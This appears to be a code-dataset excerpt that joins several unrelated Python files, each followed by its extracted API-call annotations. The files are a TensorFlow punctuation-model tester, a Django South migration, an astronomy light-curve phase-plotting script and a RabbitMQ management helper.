"(self, 'login_name')\n", (2004, 2024), False, 'import pulumi\n'), ((2101, 2125), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (2111, 2125), False, 'import pulumi\n'), ((2797, 2819), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (2817, 2819), False, 'import pulumi\n'), ((2911, 3015), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""sonarqube:index/getUsers:getUsers"""', '__args__'], {'opts': 'opts', 'typ': 'GetUsersResult'}), "('sonarqube:index/getUsers:getUsers', __args__, opts=\n opts, typ=GetUsersResult)\n", (2932, 3015), False, 'import pulumi\n')] |
import logging
import os
import tensorflow as tf
from punc_recover.models.punc_transformer import PuncTransformer
from punc_recover.tester.base_tester import BaseTester
from utils.text_featurizers import TextFeaturizer
class PuncTester(BaseTester):
""" Trainer for CTC Models """
def __init__(self,
config,
):
super(PuncTester, self).__init__(config['running_config'])
self.model_config = config['model_config']
self.vocab_featurizer = TextFeaturizer(config['punc_vocab'])
self.bd_featurizer = TextFeaturizer(config['punc_biaodian'])
self.opt_config = config['optimizer_config']
self.eval_metrics = {
"acc": tf.keras.metrics.Mean(),
}
def _eval_step(self, batch):
x, labels = batch
mask = self.creat_mask(x)
pred_bd = self.model.inference(x, mask)
acc=self.classes_acc(labels,pred_bd)
self.eval_metrics["acc"].update_state(acc)
def creat_mask(self, seq):
seq_pad = tf.cast(tf.equal(seq, 0), tf.float32)
return seq_pad[:, tf.newaxis, tf.newaxis, :] # (batch_size, 1, 1, seq_len)
def classes_acc(self, real, pred):
mask = tf.math.logical_not(tf.math.equal(real, 0))
accs = tf.keras.metrics.sparse_categorical_accuracy(real,pred)
mask = tf.cast(mask, dtype=accs.dtype)
accs *= mask
final=tf.reduce_sum(accs,-1)/tf.reduce_sum(mask,-1)
return tf.reduce_mean(final)
def compile(self, ):
self.model = PuncTransformer(num_layers=self.model_config['num_layers'],
d_model=self.model_config['d_model'],
enc_embedding_dim=self.model_config['enc_embedding_dim'],
num_heads=self.model_config['num_heads'],
dff=self.model_config['dff'],
input_vocab_size=self.vocab_featurizer.num_classes,
bd_vocab_size=self.bd_featurizer.num_classes,
pe_input=self.model_config['pe_input'],
rate=self.model_config['rate'])
self.model._build()
self.load_checkpoint()
logging.info('trainer resume failed')
self.model.summary(line_length=100)
def run(self, ):
self._eval_batches()
def load_checkpoint(self, ):
"""Load checkpoint."""
self.checkpoint_dir = os.path.join(self.running_config["outdir"], "checkpoints")
files = os.listdir(self.checkpoint_dir)
files.sort(key=lambda x: int(x.split('_')[-1].replace('.h5', '')))
self.model.load_weights(os.path.join(self.checkpoint_dir, files[-1]))
| [
"utils.text_featurizers.TextFeaturizer",
"os.listdir",
"tensorflow.equal",
"tensorflow.reduce_sum",
"tensorflow.keras.metrics.Mean",
"os.path.join",
"tensorflow.keras.metrics.sparse_categorical_accuracy",
"tensorflow.math.equal",
"tensorflow.reduce_mean",
"punc_recover.models.punc_transformer.Punc... | [((507, 543), 'utils.text_featurizers.TextFeaturizer', 'TextFeaturizer', (["config['punc_vocab']"], {}), "(config['punc_vocab'])\n", (521, 543), False, 'from utils.text_featurizers import TextFeaturizer\n'), ((573, 612), 'utils.text_featurizers.TextFeaturizer', 'TextFeaturizer', (["config['punc_biaodian']"], {}), "(config['punc_biaodian'])\n", (587, 612), False, 'from utils.text_featurizers import TextFeaturizer\n'), ((1277, 1333), 'tensorflow.keras.metrics.sparse_categorical_accuracy', 'tf.keras.metrics.sparse_categorical_accuracy', (['real', 'pred'], {}), '(real, pred)\n', (1321, 1333), True, 'import tensorflow as tf\n'), ((1349, 1380), 'tensorflow.cast', 'tf.cast', (['mask'], {'dtype': 'accs.dtype'}), '(mask, dtype=accs.dtype)\n', (1356, 1380), True, 'import tensorflow as tf\n'), ((1478, 1499), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['final'], {}), '(final)\n', (1492, 1499), True, 'import tensorflow as tf\n'), ((1546, 1968), 'punc_recover.models.punc_transformer.PuncTransformer', 'PuncTransformer', ([], {'num_layers': "self.model_config['num_layers']", 'd_model': "self.model_config['d_model']", 'enc_embedding_dim': "self.model_config['enc_embedding_dim']", 'num_heads': "self.model_config['num_heads']", 'dff': "self.model_config['dff']", 'input_vocab_size': 'self.vocab_featurizer.num_classes', 'bd_vocab_size': 'self.bd_featurizer.num_classes', 'pe_input': "self.model_config['pe_input']", 'rate': "self.model_config['rate']"}), "(num_layers=self.model_config['num_layers'], d_model=self.\n model_config['d_model'], enc_embedding_dim=self.model_config[\n 'enc_embedding_dim'], num_heads=self.model_config['num_heads'], dff=\n self.model_config['dff'], input_vocab_size=self.vocab_featurizer.\n num_classes, bd_vocab_size=self.bd_featurizer.num_classes, pe_input=\n self.model_config['pe_input'], rate=self.model_config['rate'])\n", (1561, 1968), False, 'from punc_recover.models.punc_transformer import PuncTransformer\n'), ((2309, 2346), 'logging.info', 'logging.info', (['"""trainer resume failed"""'], {}), "('trainer resume failed')\n", (2321, 2346), False, 'import logging\n'), ((2539, 2597), 'os.path.join', 'os.path.join', (["self.running_config['outdir']", '"""checkpoints"""'], {}), "(self.running_config['outdir'], 'checkpoints')\n", (2551, 2597), False, 'import os\n'), ((2614, 2645), 'os.listdir', 'os.listdir', (['self.checkpoint_dir'], {}), '(self.checkpoint_dir)\n', (2624, 2645), False, 'import os\n'), ((715, 738), 'tensorflow.keras.metrics.Mean', 'tf.keras.metrics.Mean', ([], {}), '()\n', (736, 738), True, 'import tensorflow as tf\n'), ((1049, 1065), 'tensorflow.equal', 'tf.equal', (['seq', '(0)'], {}), '(seq, 0)\n', (1057, 1065), True, 'import tensorflow as tf\n'), ((1238, 1260), 'tensorflow.math.equal', 'tf.math.equal', (['real', '(0)'], {}), '(real, 0)\n', (1251, 1260), True, 'import tensorflow as tf\n'), ((1416, 1439), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['accs', '(-1)'], {}), '(accs, -1)\n', (1429, 1439), True, 'import tensorflow as tf\n'), ((1439, 1462), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['mask', '(-1)'], {}), '(mask, -1)\n', (1452, 1462), True, 'import tensorflow as tf\n'), ((2753, 2797), 'os.path.join', 'os.path.join', (['self.checkpoint_dir', 'files[-1]'], {}), '(self.checkpoint_dir, files[-1])\n', (2765, 2797), False, 'import os\n')] |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ProductVersion.cc_version'
db.add_column('core_productversion', 'cc_version', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)
# Adding field 'Product.cc_version'
db.add_column('core_product', 'cc_version', self.gf('django.db.models.fields.IntegerField')(default=0), keep_default=False)
def backwards(self, orm):
# Deleting field 'ProductVersion.cc_version'
db.delete_column('core_productversion', 'cc_version')
# Deleting field 'Product.cc_version'
db.delete_column('core_product', 'cc_version')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.product': {
'Meta': {'ordering': "['name']", 'object_name': 'Product'},
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558711)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'has_team': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558895)'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'own_team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
},
'core.productversion': {
'Meta': {'ordering': "['product', 'order']", 'object_name': 'ProductVersion'},
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 559819)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'environments': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'productversion'", 'symmetrical': 'False', 'to': "orm['environments.Environment']"}),
'has_team': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 560004)'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'own_team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'versions'", 'to': "orm['core.Product']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'}
},
'environments.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562776)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562967)'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'environments.element': {
'Meta': {'ordering': "['name']", 'object_name': 'Element'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'elements'", 'to': "orm['environments.Category']"}),
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 561818)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 562003)'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'environments.environment': {
'Meta': {'object_name': 'Environment'},
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 555711)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'elements': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'environments'", 'symmetrical': 'False', 'to': "orm['environments.Element']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 555910)'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'environments'", 'null': 'True', 'to': "orm['environments.Profile']"})
},
'environments.profile': {
'Meta': {'object_name': 'Profile'},
'cc_version': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 557817)'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'deleted_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 25, 0, 0, 59, 558002)'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['core']
| [
"south.db.db.delete_column"
] | [((652, 705), 'south.db.db.delete_column', 'db.delete_column', (['"""core_productversion"""', '"""cc_version"""'], {}), "('core_productversion', 'cc_version')\n", (668, 705), False, 'from south.db import db\n'), ((761, 807), 'south.db.db.delete_column', 'db.delete_column', (['"""core_product"""', '"""cc_version"""'], {}), "('core_product', 'cc_version')\n", (777, 807), False, 'from south.db import db\n')] |
import matplotlib.pyplot as pl
import os
import numpy as np
from ticle.data.dataHandler import normalizeData,load_file
from ticle.analysis.analysis import get_phases,normalize_phase
pl.rc('xtick', labelsize='x-small')
pl.rc('ytick', labelsize='x-small')
pl.rc('font', family='serif')
pl.rcParams.update({'font.size': 20})
pl.tight_layout()
path = os.getcwd()
phase_dir = f"{path}/results/phase_plots"
try:
os.makedirs(phase_dir)
except FileExistsError:
pass
data_dir = f"{path}/data/"
data_list_file = f"{data_dir}/dataList.txt"
data_list = np.loadtxt(data_list_file)
for data in data_list:
star = f"0{int(data[0])}"
file_name = f"{data_dir}/{star}/{star}_LC_destepped.txt"
res_dir = f"{phase_dir}/{star}"
try:
os.mkdir(res_dir)
except FileExistsError:
pass
t_series = load_file(file_name)
t_series = normalizeData(t_series)
p = [(f"Phaseplot {star} - literature","literature",data[2]),
(f"Phaseplot {star} - P={data[1]} days",f"result",data[1])]
for title,save_text,period in p:
masks = get_phases(t_series,period)
fig_phase = pl.figure(figsize=(10,7))
for i in masks:
plot_data = normalize_phase(np.array((t_series[0][i],t_series[1][i])))
pl.plot(plot_data[0],plot_data[1],linewidth = 1)
pl.xlabel("Phase")
pl.ylabel("Flux")
pl.title(title)
fig_phase.savefig(f"{res_dir}/{star}_{save_text}_phase_.pdf")
fig_lightcurve = pl.figure(figsize=(10,7))
for i in masks:
pl.plot(t_series[0][i],t_series[1][i],linewidth = 1)
pl.xlabel("Period(days)")
pl.ylabel("Flux")
pl.title(f"{star} Lightcurve {save_text}")
fig_lightcurve.savefig(f"{res_dir}/{star}_{save_text}_lightcurve.pdf") | [
"os.makedirs",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"ticle.data.dataHandler.load_file",
"os.getcwd",
"ticle.data.dataHandler.normalizeData",
"matplotlib.pyplot.rcParams.update",
"matplotlib.pyplot.figure",
"ticle.analysis.analysis.get_phases",
"numpy.... | [((184, 219), 'matplotlib.pyplot.rc', 'pl.rc', (['"""xtick"""'], {'labelsize': '"""x-small"""'}), "('xtick', labelsize='x-small')\n", (189, 219), True, 'import matplotlib.pyplot as pl\n'), ((220, 255), 'matplotlib.pyplot.rc', 'pl.rc', (['"""ytick"""'], {'labelsize': '"""x-small"""'}), "('ytick', labelsize='x-small')\n", (225, 255), True, 'import matplotlib.pyplot as pl\n'), ((256, 285), 'matplotlib.pyplot.rc', 'pl.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (261, 285), True, 'import matplotlib.pyplot as pl\n'), ((286, 323), 'matplotlib.pyplot.rcParams.update', 'pl.rcParams.update', (["{'font.size': 20}"], {}), "({'font.size': 20})\n", (304, 323), True, 'import matplotlib.pyplot as pl\n'), ((324, 341), 'matplotlib.pyplot.tight_layout', 'pl.tight_layout', ([], {}), '()\n', (339, 341), True, 'import matplotlib.pyplot as pl\n'), ((350, 361), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (359, 361), False, 'import os\n'), ((554, 580), 'numpy.loadtxt', 'np.loadtxt', (['data_list_file'], {}), '(data_list_file)\n', (564, 580), True, 'import numpy as np\n'), ((414, 436), 'os.makedirs', 'os.makedirs', (['phase_dir'], {}), '(phase_dir)\n', (425, 436), False, 'import os\n'), ((825, 845), 'ticle.data.dataHandler.load_file', 'load_file', (['file_name'], {}), '(file_name)\n', (834, 845), False, 'from ticle.data.dataHandler import normalizeData, load_file\n'), ((861, 884), 'ticle.data.dataHandler.normalizeData', 'normalizeData', (['t_series'], {}), '(t_series)\n', (874, 884), False, 'from ticle.data.dataHandler import normalizeData, load_file\n'), ((750, 767), 'os.mkdir', 'os.mkdir', (['res_dir'], {}), '(res_dir)\n', (758, 767), False, 'import os\n'), ((1076, 1104), 'ticle.analysis.analysis.get_phases', 'get_phases', (['t_series', 'period'], {}), '(t_series, period)\n', (1086, 1104), False, 'from ticle.analysis.analysis import get_phases, normalize_phase\n'), ((1125, 1151), 'matplotlib.pyplot.figure', 'pl.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (1134, 1151), True, 'import matplotlib.pyplot as pl\n'), ((1329, 1347), 'matplotlib.pyplot.xlabel', 'pl.xlabel', (['"""Phase"""'], {}), "('Phase')\n", (1338, 1347), True, 'import matplotlib.pyplot as pl\n'), ((1356, 1373), 'matplotlib.pyplot.ylabel', 'pl.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (1365, 1373), True, 'import matplotlib.pyplot as pl\n'), ((1382, 1397), 'matplotlib.pyplot.title', 'pl.title', (['title'], {}), '(title)\n', (1390, 1397), True, 'import matplotlib.pyplot as pl\n'), ((1494, 1520), 'matplotlib.pyplot.figure', 'pl.figure', ([], {'figsize': '(10, 7)'}), '(figsize=(10, 7))\n', (1503, 1520), True, 'import matplotlib.pyplot as pl\n'), ((1619, 1644), 'matplotlib.pyplot.xlabel', 'pl.xlabel', (['"""Period(days)"""'], {}), "('Period(days)')\n", (1628, 1644), True, 'import matplotlib.pyplot as pl\n'), ((1653, 1670), 'matplotlib.pyplot.ylabel', 'pl.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (1662, 1670), True, 'import matplotlib.pyplot as pl\n'), ((1679, 1721), 'matplotlib.pyplot.title', 'pl.title', (['f"""{star} Lightcurve {save_text}"""'], {}), "(f'{star} Lightcurve {save_text}')\n", (1687, 1721), True, 'import matplotlib.pyplot as pl\n'), ((1271, 1319), 'matplotlib.pyplot.plot', 'pl.plot', (['plot_data[0]', 'plot_data[1]'], {'linewidth': '(1)'}), '(plot_data[0], plot_data[1], linewidth=1)\n', (1278, 1319), True, 'import matplotlib.pyplot as pl\n'), ((1557, 1609), 'matplotlib.pyplot.plot', 'pl.plot', (['t_series[0][i]', 't_series[1][i]'], {'linewidth': '(1)'}), '(t_series[0][i], t_series[1][i], linewidth=1)\n', (1564, 1609), True, 'import matplotlib.pyplot as pl\n'), ((1216, 1258), 'numpy.array', 'np.array', (['(t_series[0][i], t_series[1][i])'], {}), '((t_series[0][i], t_series[1][i]))\n', (1224, 1258), True, 'import numpy as np\n')] |
#!/usr/bin/python
import shlex
import simplejson
from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE
class RabbitManagementUtil(object):
def __init__(self, config, options=None, sysname=None):
"""
Given a config object (system CFG or rabbit mgmt config), extracts the correct config
and prepares util for subsequent calls to RabbitMQ via management plugin REST API.
"""
self.mgmt_cfg = self.get_mgmt_config(config, sysname)
self.connect_str = self.build_connect_str(self.mgmt_cfg)
self.options = options
self.sysname = sysname
self.call_args = self.connect_str
if self.options:
self.call_args += "_" + self.options
self.parser = make_parser()
@staticmethod
def get_mgmt_config(config, sysname=None):
""" Returns the RabbitMq management config dict from indirect reference in container CFG
or from given config dict. """
if not config:
raise RuntimeError("Bad config argument")
if "container" in config and hasattr(config, "get_safe"):
mgmt_cfg_key = config.get_safe("container.messaging.management.server", "rabbit_manage")
mgmt_cfg = config.get_safe("server." + mgmt_cfg_key)
elif "host" in config:
mgmt_cfg = config
else:
raise RuntimeError("Bad RabbitMQ management config")
sysname = sysname or "scioncc"
mgmt_cfg = mgmt_cfg.copy()
mgmt_cfg["host"] = mgmt_cfg.get("host", None) or "localhost"
mgmt_cfg["port"] = mgmt_cfg.get("port", None) or "15672"
mgmt_cfg["username"] = mgmt_cfg.get("username", None) or "guest"
mgmt_cfg["password"] = mgmt_cfg.get("password", None) or "<PASSWORD>"
mgmt_cfg["vhost"] = mgmt_cfg.get("vhost", None) or "/"
mgmt_cfg["system_exchange"] = mgmt_cfg.get("system_exchange", None)
if not mgmt_cfg["system_exchange"] and "exchange" in config and hasattr(config, "get_safe"):
mgmt_cfg["system_exchange"] = "%s.%s" % (sysname, config.get_safe('exchange.core.system_xs', 'system'))
mgmt_cfg["events_xp"] = mgmt_cfg.get("events_xp", None)
if not mgmt_cfg["events_xp"] and "exchange" in config and hasattr(config, "get_safe"):
mgmt_cfg["events_xp"] = "%s.%s" % (mgmt_cfg["system_exchange"], config.get_safe('exchange.core.events', 'events'))
return mgmt_cfg
@staticmethod
def build_connect_str(mgmt_cfg):
connect_str = "-q -H {0} -P {1} -u {2} -p {3} -V {4}".format(
mgmt_cfg["host"], mgmt_cfg["port"], mgmt_cfg["username"], mgmt_cfg["password"], mgmt_cfg["vhost"])
return connect_str
@staticmethod
def get_mgmt_url(config, feats=None):
mgmt_cfg = RabbitManagementUtil.get_mgmt_config(config)
feats = feats or []
url = "http://%s:%s/api/%s" % (mgmt_cfg["host"], mgmt_cfg["port"], "/".join(feats))
return url
# -------------------------------------------------------------------------
# Util methods
def clean_by_prefix(self, prefix):
"""
Utility method to clean (sysname) prefixed exchanges and queues on a broker.
@param prefix The sysname / prefix to use to select exchanges and queues to delete.
Must be the prefix to the exchange or queue or this will not be deleted.
@returns A 2-tuple of (list of exchanges deleted, list of queues deleted).
"""
exchanges = self.list_names('exchanges')
deleted_exchanges = self.delete_names_with_prefix('exchange', exchanges, prefix)
queues = self.list_names('queues')
deleted_queues = self.delete_names_with_prefix('queue', queues, prefix)
return deleted_exchanges, deleted_queues
def clean_by_sysname(self, sysname=None):
sysname = sysname or self.sysname
if not sysname:
raise RuntimeError("Must provide sysname")
return self.clean_by_prefix(sysname or self.sysname)
def declare_exchange(self, xp):
if xp == "events":
ex_name = self.mgmt_cfg["events_xp"]
else:
ex_name = self.mgmt_cfg["system_exchange"]
cmd_str = '{0} declare exchange name="{1}" durable=false auto_delete=true type=topic'.format(self.call_args, ex_name)
(options, args) = self.parser.parse_args(shlex.split(cmd_str))
mgmt = Management(options, args[1:])
mgmt.invoke_declare()
def declare_queue(self, xp, queue_name):
if xp == "events":
ex_name = self.mgmt_cfg["events_xp"]
else:
ex_name = self.mgmt_cfg["system_exchange"]
if queue_name.startswith(self.sysname):
qqueue_name = queue_name
else:
qqueue_name = ".".join([ex_name, queue_name])
cmd_str = '{0} declare queue name="{1}" durable=false auto_delete=false'.format(self.call_args, qqueue_name)
(options, args) = self.parser.parse_args(shlex.split(cmd_str))
mgmt = Management(options, args[1:])
mgmt.invoke_declare()
def bind_queue(self, xp, queue_name, binding):
if xp == "events":
ex_name = self.mgmt_cfg["events_xp"]
else:
ex_name = self.mgmt_cfg["system_exchange"]
if queue_name.startswith(self.sysname):
qqueue_name = queue_name
else:
qqueue_name = ".".join([ex_name, queue_name])
cmd_str = '{0} declare binding source="{1}" destination="{2}" destination_type=queue routing_key="{3}"'.format(
self.call_args, ex_name, qqueue_name, binding)
(options, args) = self.parser.parse_args(shlex.split(cmd_str))
mgmt = Management(options, args[1:])
mgmt.invoke_declare()
# TODO: Move the management calls from pyon.ion.exchange here
# -------------------------------------------------------------------------
# Helpers
def list_names(self, listable_type):
list_str = '%s list %s name' % (self.call_args, listable_type)
(options, args) = self.parser.parse_args(shlex.split(list_str))
mgmt = Management(options, args[1:])
uri = mgmt.list_show_uri(LISTABLE, 'list', mgmt.args[1:])
output_json = mgmt.get(uri)
listables = simplejson.loads(output_json)
return listables
def list_names_with_prefix(self, listables, name_prefix):
return [l['name'] for l in listables if l['name'].startswith(name_prefix)]
# This function works on exchange, queue, vhost, user
def delete_names_with_prefix(self, deletable_type, deleteable, name_prefix):
deleted = []
for d in deleteable:
try:
if d['name'].startswith(name_prefix):
delete_cmd = '%s delete %s name="%s"' % (self.call_args, deletable_type, d['name'])
(options, args) = self.parser.parse_args(shlex.split(delete_cmd))
mgmt = Management(options, args[1:])
mgmt.invoke_delete()
deleted.append(d['name'])
except KeyError:
# Some has no key 'name'
pass
return deleted
| [
"shlex.split",
"putil.rabbitmq.rabbitmqadmin.make_parser",
"simplejson.loads",
"putil.rabbitmq.rabbitmqadmin.Management"
